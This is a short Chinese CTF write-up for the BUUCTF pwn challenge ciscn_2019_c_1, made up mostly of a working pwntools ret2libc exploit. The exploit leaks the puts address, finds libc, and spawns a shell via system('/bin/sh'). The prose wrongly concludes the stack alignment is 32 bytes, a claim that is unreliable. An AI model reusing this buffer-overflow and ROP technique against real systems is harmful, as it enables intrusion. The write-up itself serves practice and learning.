标签归档:BUUCTF

BUUCTF Pwn ciscn_2019_c_1

本题涉及了栈对齐问题,这个pwn在ubuntu18上运行,调用system的时候需要加1个retn来去补齐,目前不知道具体的原因。经实验再多加4个retn也可,可知这个栈对齐是32字节的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context(arch="amd64",os="linux")

pop_rdi = 0x0000000000400c83
puts_got_addr = 0x602020
puts_plt_addr = 0x4006e0
encrypt_sym_addr = 0x4009A0
ret = 0x4006b9

#p = remote("node3.buuoj.cn",28578)
p=process("./ciscn_2019_c_1")
p.sendline("1")
payload=b'0'*0x50+p64(0)+p64(pop_rdi)+p64(puts_got_addr)+p64(puts_plt_addr)+p64(encrypt_sym_addr)
p.sendline(payload)
p.recvuntil("Ciphertext\n")
p.recvuntil("\n")

GOT_puts=p.recvuntil("\n").split()[0]
print(GOT_puts)
for i in range(len(GOT_puts),8):
    GOT_puts += b'\x00'
GOT_puts = u64(GOT_puts)

libc = LibcSearcher("puts",GOT_puts)
ADDR_LibC_base = GOT_puts - libc.dump("puts")
ADDR_system = ADDR_LibC_base + libc.dump("system")
ADDR_String_Sh = ADDR_LibC_base + libc.dump("str_bin_sh")
payload=b'0'*0x50+p64(0)+p64(ret)+p64(ret)+p64(ret)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(ADDR_String_Sh)+p64(ADDR_system) # 删去4个retn也可
p.sendline(payload)

p.interactive()